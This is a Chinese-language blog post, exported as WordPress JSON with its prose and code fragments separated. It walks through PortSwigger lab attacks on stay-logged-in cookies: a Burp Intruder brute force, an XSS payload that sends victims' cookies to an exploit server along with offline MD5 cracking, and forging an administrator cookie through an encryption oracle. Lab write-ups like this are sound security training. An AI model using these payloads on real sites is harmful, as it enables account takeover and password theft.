\u4fdd\u6301\u767b\u5165\u72c0\u614b\u662f\u4e00\u500b\u5e38\u898b\u7684\u529f\u80fd\uff0c\u9019\u8868\u793a\u5728\u4f7f\u7528\u8005\u95dc\u9589\u700f\u89bd\u5668\u5de5\u4f5c\u968e\u6bb5\u5f8c\u4e5f\u53ef\u4ee5\u4fdd\u6301\u767b\u5165\u72c0\u614b\uff0c\u5e38\u898b\u505a\u6cd5\u662f\u5c07token\u5132\u5b58\u5728cookie\u4e2d\u3002<\/p>\n\n\n\n
\u4e00\u4e9b\u7db2\u7ad9\u6839\u64da\u53ef\u9810\u6e2c\u7684\u975c\u614b\u503c\u4e32\u806f\uff08\u4f8b\u5982\u4f7f\u7528\u8005\u540d\u7a31\u548c\u6642\u9593\u6233\u8a18\uff09\u7522\u751f\u6b64 cookie\u3002\u6709\u4e9b\u751a\u81f3\u4f7f\u7528\u5bc6\u78bc\u4f5c\u70ba cookie \u7684\u4e00\u90e8\u5206\u3002\u653b\u64ca\u8005\u4e00\u65e6\u7814\u7a76\u9019\u4e9bcookie\u4e26\u6210\u529f\u63a8\u65b7\u5b83\u662f\u5982\u4f55\u7522\u751f\u7684\uff0c\u5c31\u53ef\u4ee5\u5617\u8a66\u4ee5\u66b4\u529b\u7834\u89e3\u5176\u4ed6\u4f7f\u7528\u8005\u7684cookie\u4f86\u5b58\u53d6\u4ed6\u5011\u7684\u5e33\u6236<\/p>\n\n\n\n
\u5e38\u898b\u7684\u60c5\u5883\u6709\u4ee5\u4e0b\u5169\u7a2e<\/p>\n\n\n\n
password\u7de8\u78bc\u5b58\u5728 \u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n \u67d0\u7db2\u7ad9 \u7531\u6b64\u53ef\u77e5\u683c\u5f0f\u70babase64(username+’:’+md5(Password))\uff0c\u56e0\u6b64\u53ef\u4ee5\u6839\u64da\u6b64\u683c\u5f0f\u9032\u884c\u7206\u529b\u5bc6\u78bc\u7834\u89e3<\/p>\n\n\n\n \u5047\u5982\u653b\u64ca\u76ee\u6a19\u662fcarlos\uff0c\u53ef\u5c07\u5e36\u6709 \u767c\u52d5\u7206\u7834\u5f8c\uff0c\u5982\u679c\u770b\u5230\u8fd4\u56de\u7684\u5167\u5bb9\u7279\u5225\u9577,\u8868\u793a\u5df1\u6210\u529f\u731c\u5230\u5bc6\u78bc<\/p>\n\n\n\n Lab: Brute-forcing a stay-logged-in cookie<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n password\u52a0\u5bc6\u65b9\u5f0f\u5b58\u5728cookie\u88ab\u767c\u73fe\uff0c\u53ea\u8981\u5077\u5230cookie\u5c31\u80fd\u77e5\u9053password<\/p>\n\n\n\n \u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n \u67d0\u7db2\u7ad9 \u7531\u6b64\u53ef\u77e5\u683c\u5f0f\u70babase64(username+’:’+md5(Password))\uff0c\u56e0\u6b64\u62ff\u5230\u6b64cookie\u5c31\u80fd\u77e5\u9053\u5e33\u865f\u5bc6\u78bc<\/p>\n\n\n\n <\/p>\n\n\n\n \u7531\u65bc\u8a72\u7db2\u7ad9\u7684comment\u6709xss\u6f0f\u6d1e\uff0c\u56e0\u6b64\u53ef\u63d2\u5165\u4ee5\u4e0b\u8a9e\u6cd5<\/p>\n\n\n\n \u7576\u53d7\u5bb3\u8005\u8a2a\u554f\u5230\u8a72comment\u6642\uff0c\u5c31\u6703\u89f8\u767cxss\u5c07\u81ea\u5df1\u7684cookie\u9001\u5230\u653b\u64ca\u8005\u4e3b\u6a5f<\/p>\n\n\n\n \u653b\u64ca\u8005\u4e3b\u6a5f\u7684\u65e5\u5fd7\u6703\u986f\u793a\u5982\u4e0b\u5167\u5bb9<\/p>\n\n\n\n \u5c07 \u5728\u628amd5\u5b57\u4e3226323c16d5f4dabff3bb136f2460a943\u62ff\u53bb\uff4dd5\u7dda\u4e0a\u67e5\u8a62\u7db2\u7ad9\u67e5\u5c31\u53ef\u5f97\u5230\u5bc6\u78bconceuponatime<\/p>\n\n\n\n Lab: Offline password cracking<\/p>\n\n\n\n <\/p>\n\n\n\n <\/p>\n\n\n\n \u6709\u4e9b\u7db2\u7ad9\u5728\u8a2d\u8a08\u7684\u6642\u5019\u6c92\u6709\u6ce8\u610f\u5230\u5c0dtoken\u7684\u52a0\u89e3\u5bc6\u65b9\u5f0f\uff0c\u5728\u5176\u4ed6\u529f\u80fd\u4e5f\u6703\u4f7f\u7528\uff0c\u56e0\u6b64\u53ef\u4ee5\u5229\u7528\u5176\u4ed6\u529f\u80fd\u53bb\u89e3\u5bc6token\uff0c\u56e0\u6b64\u53ef\u900f\u904e\u63a8\u7406token\u52a0\u89e3\u5bc6\u65b9\u5f0f\u7e5e\u904e\u8a8d\u8b49\u6a5f\u5236<\/p>\n\n\n\n \u7559\u8a00\u6642\u7684\/post\/comment \u53ef\u52a0\u5bc6<\/p>\n\n\n\n \u7559\u8a00\u6642\u7684\/post?postId=1\u53ef\u89e3\u5bc6Invalid-email-cipher-text<\/p>\n\n\n\n \u9664\u6b64\u4e4b\u5916\uff0c\u7559\u8a00\u6642\u7684\/post?postId=1\u4e5f\u53ef\u89e3\u5bc6stay-logged-in-cookie<\/p>\n\n\n\n <\/p>\n\n\n\n \u6e2c\u8a66\u7559\u8a00\u6642\u7684\/post\/comment \u53ef\u5426\u52a0\u5bc6administrator:1631253288302 <\/p>\n\n\n\n \u6e2c\u8a66\u7559\u8a00\u6642\u7684\/post?postId=1\u53ef\u5426\u89e3\u5bc6cipher-text(administrator:1631253288302)<\/mark><\/p>\n\n\n\n \u89c0\u5bdf\u6bd4\u8f03\u767c\u73fe\uff0c\u81ea\u5df1\u52a0\u89e3\u5bc6\u591a\u4e86 \u4f7f\u7528\/post\/comment\u81ea\u5df1\u52a0\u5bc6administrator:1631253288302 <\/p>\n\n\n\n \u539f\u672cstay-logged-in\u7684cookie<\/p>\n\n\n\n \u5c0dcookie\u9032\u884curldecode\u5f8c\u5728\u505abase64decode\uff0c\u5728hex\u5340\u57df\u522a\u966423\u500bbyte\u5f8c\uff0c\u505abase64encode\u5728\u505aurlencode\u5f97\u5230\u4ee5\u4e0b<\/p>\n\n\n\n \u5617\u8a66\u7528\/post?postId=1\u89e3\u5bc6\uff0c\u4f46\u8fd4\u56de\u932f\u8aa4\u8a0a\u606f\uff0c\u56e0\u70ba\u662f\u57fa\u65bc\u5340\u584a\u52a0\u5bc6\u6cd5\uff0c\u6240\u4ee5\u8f38\u5165\u9577\u5ea6\u5fc5\u9808\u662f16\u7684\u500d\u6578<\/p>\n\n\n\n <\/p>\n\n\n\n \u70ba\u4e86\u6eff\u8db316\u500d\u6578\uff0c\u56e0\u6b64\u8981 \u53ef\u4ee5\u6bd4\u8f03\u548c\u4e4b\u524d\u7684\u4e0d\u540c\u4e4b\u8655\uff0c\u5982\u4e0b<\/p>\n\n\n\n <\/p>\n\n\n\n \u6839\u64da\u6bd4\u8f03\u7d50\u679c\u5f97\u77e5\uff0c\u505a\u6cd5\u61c9\u8a72\u662f\u8981\u5c0dcookie\u9032\u884curldecode\u5f8c\u5728\u505abase64decode\uff0c\u5728hex\u5340\u57df\u522a\u966432(23+9)\u500bbyte\u5f8c\uff0c\u505abase64encode\u5728\u505aurlencode\uff0c\u6700\u5f8c\u5f97\u5230 \u63a5\u8457\u5617\u8a66\u7528\/post?postId=1\u89e3\u5bc6\uff0c\u6210\u529f\u8fd4\u56de\u9810\u671f\u7d50\u679c \u56e0\u6b64\u5728\u8acb\u6c42\u6642\u628acookie\u4e2d\u7684stay-logged-in\u63db\u4e0a Lab: Authentication bypass via encryption oracle<\/p>\n","protected":false},"excerpt":{"rendered":" \u4fdd\u6301\u767b\u5165\u72c0\u614b\u662f\u4e00\u500b\u5e38\u898b\u7684\u529f\u80fd\uff0c\u9019\u8868\u793a\u5728\u4f7f\u7528\u8005\u95dc\u9589\u700f\u89bd\u5668\u5de5\u4f5c\u968e\u6bb5\u5f8c\u4e5f\u53ef\u4ee5\u4fdd\u6301\u767b\u5165\u72c0\u614b\uff0c\u5e38\u898b\u505a\u6cd5\u662f\u5c07token\u5132\u5b58\u5728cookie\u4e2d\u3002\u4e00\u4e9b\u7db2\u7ad9\u6839\u64da\u53ef\u9810\u6e2c\u7684\u975c\u614b\u503c\u4e32\u806f\uff08\u4f8b\u5982\u4f7f\u7528\u8005\u540d\u7a31\u548c\u6642\u9593\u6233\u8a18\uff09\u7522\u751f\u6b64 cookie\u3002\u6709\u4e9b\u751a\u81f3\u4f7f\u7528\u5bc6\u78bc\u4f5c\u70ba cookie \u7684\u4e00\u90e8\u5206\u3002\u653b\u64ca\u8005\u4e00\u65e6\u7814\u7a76\u9019\u4e9bcookie\u4e26\u6210\u529f\u63a8\u65b7\u5b83\u662f\u5982\u4f55\u7522\u751f\u7684\uff0c\u5c31\u53ef\u4ee5\u5617\u8a66\u4ee5\u66b4\u529b\u7834\u89e3\u5176\u4ed6\u4f7f\u7528\u8005\u7684cookie\u4f86\u5b58\u53d6\u4ed6\u5011\u7684\u5e33\u6236<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1529","post","type-post","status-publish","format-standard","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1529","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1529"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1529\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1529"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1529"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1529"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}cookie<\/code>\u88ab\u767c\u73fe\uff0c\u53ef\u4ee5\u900f\u904e\u7206\u529b\u7834\u89e3\u731c\u5bc6\u78bc<\/p>\n\n\n\ncookie<\/code>\u5167\u7684Stay-logged-in<\/code>\uff0c\u7528base64\u89e3\u78bc\u5f8c\u5f97\u5230wiener:51dc30ddc473d43a6011e9ebba6ca770\uff0c\u5728\u5230\uff4dd5\u7dda\u4e0a\u67e5\u8a62\u7db2\u7ad9\u67e551dc30ddc473d43a6011e9ebba6ca770\u53ef\u4ee5\u525b\u597d\u548c\u5bc6\u78bc\u4e00\u6a23\u662fpeter<\/p>\n\n\n\nStay logged in<\/code>\u7684\u8acb\u6c42\u9001\u5230Burp Intruder<\/code>\uff0c\u4e26\u4f9d\u7167\u4ee5\u4e0b\u914d\u7f6e\u8a2d\u5b9a\u7206\u529b\u7834\u89e3<\/p>\n\n\n\npayload type: simple list<\/code> , \u8cbc\u4e0a\u5b57\u5178\u6a94\u5167\u5bb9<\/p>\n\n\n\npayloads:Payload processing<\/code> \u5340\u57df, \u6309\u4ee5\u4e0b\u9806\u5e8f\u589e\u52a0<\/p>\n\n\n\nHash: MD5<\/span>\nAdd prefix: carlos :<\/span>\nEncode: Base64-encode<\/span><\/code><\/pre>\n\n\n\n
\n\n\n\n\u5077cookie\u53d6\u5f97\u5bc6\u78bc<\/h1>\n\n\n\n
cookie<\/code>\u4e2dStay-logged-in<\/code>\uff0c\u7528base64\u89e3\u78bc\u5f8c\u5f97\u5230wiener:51dc30ddc473d43a6011e9ebba6ca770\uff0c\u5728\u5230\uff4dd5\u7dda\u4e0a\u67e5\u8a62\u7db2\u7ad9\u67e551dc30ddc473d43a6011e9ebba6ca770\u53ef\u4ee5\u525b\u597d\u548c\u5bc6\u78bc\u4e00\u6a23\u662fpeter<\/p>\n\n\n\n<script>document.location='\/\/your-exploit-server-id.web-security-academy.net\/'+document.cookie<\/script><\/code><\/p>\n\n\n\n172.31.31.164 2023-09--09 16:40:30 +0000 \"GET \/secret=eaafj32089ahplihf3804;%20stay-logged-in=eF94mmV7230dy457eOqwfm HTTP\/1.1\"<\/code><\/pre>\n\n\n\nstay-logged-in<\/code>\u5167\u5bb9\u7528base64\u89e3\u78bc\u5f8c\u5f8c\u5f97\u5230carlos:26323c16d5f4dabff3bb136f2460a943<\/code><\/p>\n\n\n\n
\n\n\n\n\u63a8\u7406cookie\u52a0\u89e3\u5bc6\u65b9\u5f0f<\/h2>\n\n\n\n
1.\u89c0\u5bdf\u53ef\u52a0\u89e3\u5bc6\u7684\u529f\u80fd<\/h3>\n\n\n\n
########### request ###########\nPOST \/post\/comment \n...omit...email=Invalid-email\n\n############ response ###########\nSet-Cookie: notification=cipher-text(Invalid-email)\n...omit...<\/code><\/pre>\n\n\n\n########### request ###########\nGET \/post?postId=1\ncookie: notification=cipher-text(Invalid-email)\n...omit...\n\n############ response ###########\n...omit...\nInvalid email address:Invalid-email\n...omit...<\/code><\/pre>\n\n\n\n########### request ###########\nGET \/post?postId=1\ncookie: notification=stay-logged-in-cookie\n...omit...\n\n############ response ###########\n...omit...\nwiener:1631253288302\n...omit...<\/code><\/pre>\n\n\n\n2.\u89c0\u5bdfstay-logged-in\u548cemail\u7684\u52a0\u89e3\u5bc6\u5167\u5bb9<\/h3>\n\n\n\n
\n########### request ###########\nPOST \/post\/comment \n...omit...email=administrator:1631253288302\n\n############ response ###########\nSet-Cookie: notification=u37cH7RgwyRO5VmRwRdLL980LgLbwhiQva%2fy%2b922LhNhsgoa94obZd3QmMVuyDtoHRu14Fqxi8Dsc%2bipoKtYaA%3d%3d<\/mark>\n...omit...<\/code><\/pre>\n\n\n\n########### request ###########\nGET \/post?postId=1\ncookie: notification=u37cH7RgwyRO5VmRwRdLL980LgLbwhiQva%2fy%2b922LhNhsgoa94obZd3QmMVuyDtoHRu14Fqxi8Dsc%2bipoKtYaA%3d%3d<\/mark>\n...omit...\n\n############ response ###########\n...omit...\nInvalid email address:administrator:1631253288302\n...omit...<\/code><\/pre>\n\n\n\nInvalid email address: <\/code><\/mark>\uff0c\u5171\u670923\u500b\u5b57\u7b26(\u542b\u5206\u865f\u548c\u7a7a\u767d)\uff0c\u6bd4\u8f03\u5982\u4e0b<\/p>\n\n\n\n\n
u37cH7RgwyRO5VmRwRdLL980LgLbwhiQva%2fy%2b922LhNhsgoa94obZd3QmMVuyDtoHRu14Fqxi8Dsc%2bipoKtYaA%3d%3d<\/mark><\/code><\/li>\n\n\n\nInvalid email address:<\/mark>administrator:1631253288302<\/code><\/li>\n<\/ul>\n\n\n\n\n
ajCH8h4j9DGNrMKUj3nHUfVjeU%2fAYWNH92qvzHTSzMs%3d<\/code><\/li>\n\n\n\nwiener:1631253288302<\/code><\/li>\n<\/ul>\n\n\n\n3.\u8abf\u6574\u52a0\u5bc6\u5167\u5bb9<\/h3>\n\n\n\n
kL2v8vvdti4TYbIKGveKG2Xd0JjFbsg7aB0bteBasYvA7HPoqaCrWGg%3D<\/mark><\/code><\/p>\n\n\n\n########### request ###########
GET \/post?postId=1
cookie: notification=kL2v8vvdti4TYbIKGveKG2Xd0JjFbsg7aB0bteBasYvA7HPoqaCrWGg%3D<\/mark>
...omit...
############ response ###########
...omit...
input length must be multiple of 16 when decrypting with padded cipher
...omit...<\/pre>\n\n\n\nadministrator:1631253288302<\/code>\u524d\u52a09\u500b\u5b57\u5143 <\/p>\n\n\n\n########### request ###########\nPOST \/post\/comment \n...omit...email=xxxxxxxxx<\/mark>administrator:1631253288302\n\n############ response ###########\nSet-Cookie: notification=u37cH7RgwyRO5VmRwRdLL0oYYvVrDGD25Rh9Edd78e%2fsLkSUXROOR3rr0Qlst2tGxEN1X7J4mmCHiFuXHtbq3A%3d%3d;<\/mark>\n...omit...\n<\/code><\/pre>\n\n\n\n\n
u37cH7RgwyRO5VmRwRdLL0oYYvVrDGD25Rh9Edd78e%2fsLkSUXROOR3rr0Qlst2tGxEN1X7J4mmCHiFuXHtbq3A%3d%3d<\/mark><\/code><\/p>\n\n\n\n\n
u37cH7RgwyRO5VmRwRdLL980LgLbwhiQva%2fy%2b922LhNhsgoa94obZd3QmMVuyDtoHRu14Fqxi8Dsc%2bipoKtYaA%3d%3d<\/mark><\/code><\/p>\n\n\n\n7C5ElF0Tjkd669EJbLdrRsRDdV%2ByeJpgh4hblx7W6tw%3D<\/mark><\/code><\/p>\n\n\n\nadministrator:1631253288302<\/code>\uff0c\u9019\u8868\u793a\u507d\u9020administrator\u7684stay-logged-in-cookie\u6210\u529f<\/p>\n\n\n\n########### request ###########
GET \/post?postId=1
cookie: notification=7C5ElF0Tjkd669EJbLdrRsRDdV%2ByeJpgh4hblx7W6tw%3D<\/mark><\/code><\/mark>
...omit...
############ response ###########
...omit...
administrator:1631253288302
...omit...<\/pre>\n\n\n\n7C5ElF0Tjkd669EJbLdrRsRDdV%2ByeJpgh4hblx7W6tw%3D<\/mark><\/code><\/mark>\uff0c\u5373\u53ef\u7528administrator\u7684\u8eab\u4efd\u8a2a\u554f\u7db2\u7ad9<\/p>\n\n\n\n